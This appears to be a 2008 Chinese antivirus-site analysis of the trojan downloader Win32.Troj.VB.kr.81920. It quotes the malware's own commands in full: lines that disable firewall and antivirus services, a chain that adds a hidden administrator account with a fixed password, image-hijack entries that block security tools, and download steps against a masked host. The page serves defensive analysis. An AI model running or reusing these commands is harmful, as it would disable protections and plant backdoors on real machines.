杀毒联盟-免费的教育教学网络资源-rav.exe,ressdt.exe,ressdt.sys延迟下载器81920,Win32.Troj.VB.kr.81920-查杀清除-最新病毒-电脑病毒-杀毒联盟

杀毒联盟
设为首页
加入收藏
免费视频
繁體中文
联盟首页 > 最新病毒 > rav.exe,ressdt.exe,ressdt.sys延迟下载器81920,Win32.Troj.VB.kr.81920
时间:2008-7-19 9:15:37

rav.exe,ressdt.exe,ressdt.sys延迟下载器81920,Win32.Troj.VB.kr.81920

rav.exe,ressdt.exe,ressdt.sys延迟下载器81920,Win32.Troj.VB.kr.81920是个木马下载器。它会将自己设为管理员权限,映像劫持大量的杀毒软件。然后从指定网址下载大量其它木马程序。

1. 运行后首先Sleep(),挂起10分钟。然后下载病毒列表。

2. cacls.exe C:\Windows\system32\cmd.exe /e /t /g everyone:F
更改cmd权限为所有用户可以执行
执行 cmd.exe /c net stop wscsvc&
net stop sharedaccess&
sc config sharedaccess start=disabled&
sc config wscsvc start= disabled&
net stop KPfwSvc&
net stop KWatchsvc&
net stop McShield&
net stop "Norton AntiVirus Server
终止或禁用一些服务

3.查找并终止以下进程shstat.exe, runiep.exe, ras.exe, MPG4C32.exe,
imsins.exe, Iparmor.exe, 360safe.exe, 360tray.exe, kmailmon.exe,
kavstart.exe, cacls.exe, cmd.exe。

4.查找杀软ccenter.exe,如果找到下载
http://ps.go****o.com/rc/1500/rav.jpg
保存到C:\windows\system32\rav.exe执行。
rav.exe会生成C:\windows\system32\ressdt.exe
注册ressdt.sys驱动,恢复ssdt,然后del ressdt.exe

5.读取http://ps.go****o.com/rc/1500/gx.txt
下载的病毒列表,并执行,实际读出的是0。下载http://ps.go****o.com/rc/1500/gx.jpg
到本地C:\windows\system32\vbb.exe并执行,这个vbb.exe会下载一些其他的病毒

6.写入注册表自启动
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\SoundMan
删除一下注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\
360Safetray
KavPFW
vptray
runeip
RavTask
RfwMain
kav

7.添加一个用户new1密码12369到管理员组
cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators new1 /add

8.通过写入一个1.inf的文件并执行,注册为服务启动,替换原系统服务键值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Service\helpsvc
原键值%SystemRoot%\System32\svchost.exe -k netsvcs
为%SystemRoot%\System32\interne.exe

其执行的语句如下:
cmd /c echo [Version]>%windir%\1.inf&
echo Signature="$WINDOWS NT$">>%windir%\1.inf&
echo [DefaultInstall.Services]>>%windir%\1.inf&
...
(略去数行)

9.新建键值
HKLM\SOFTWARE\Microsoft\Windows NT\Curre ntVersion\Winlogon\SpecialAccounts\UserList\new1=0

10.映像劫持,导致一些安全工具打不开。
把HKLM\SoftWare\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
cftmon.exe\debugger=soundman.exe
360tray.exe=svchost.exe
360safe.exe=svchost.exe
360Loader.exe=svchost.exe
kmailmon=svchost.exe
IceSword=svchost.exe
runiep=svchost.exe
ras=svchost.exe
Iparamor.exe=svchost.exe
taskmgr.exe=svchost.exe

11. 屏蔽隐藏文件的选项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

杀毒联盟专家建议

防御病毒很简单,杀毒很难:http://www.shaduu.com/virus/9794.html

全国官方在线杀毒:在线杀毒 http://www.shaduu.com/virus/50.html

rav.exe,ressdt.exe,ressdt.sys延迟下载器81920,Win32.Troj.VB.kr.81920病毒清除的方法及相关资料 文章结束

  • 上一篇病毒:
  • 下一篇病毒: 没有了
    • 频道更新
    ·rav.exe,ressdt.exe,ressdt.sys延迟
    ·china_login.mpr,mppds.dll,mppds.
    ·msi.exe破坏型广告刷子61440,Win32
    ·电信骨干网DDoS攻击防护解决方案
    ·pw.ini,sss.exe,下载 流氓下载器34
    ·SSDT 木马武装模块918,Win32.Patch
    ·1.hiv,avpnoackdf.exe,fengzi,rsdb
    ·sample.exe,yxa0999.tmp,黑客远程工
    ·.exe,40$$.bat,FinePlus.exe.exe,s
    ·sgdewg.dll,sgdewg.dll.LoG,QQ三国
    ·SkypeClient.exe,sys_32.ini,映像劫
    ·ctfmon.exe,dat3.reg,Logo1_.exe,r
    ·oohxebyt.dll,qba0999.tmp泽尼特变
    ·EULA.txt,HtmlPeek.dll,wda0999.tm
    ·909.txt,soa0999.tmp,way.jpg广告下
    相关文章
    如何手动杀新病毒
    使用木马专家查杀木马的相关技巧
    教你如何拒绝木马读取你的硬盘文档
    china_login.mpr,mppds.dll,mppds.
    msi.exe破坏型广告刷子61440,Win32
    周鸿祎"食言"涉足杀毒软件称永远免
    旧金山市政府电脑因员工窜改密码瘫
    电信骨干网DDoS攻击防护解决方案
    奥运在即 中国黑客引发担忧
    美国旧金山市政府遭遇"网络政变"
    版权所有:杀毒联盟 2007-2008 未经授权禁止复制或建立镜像,违法必究!
    \\ QQ:958566669 Tel:13752966523 文章投递:pcsjw@163.com  杀毒联盟//
    copyright © 2007-2008 www.shaduu.com online services. all rights reserved. 渝ICP备08002816号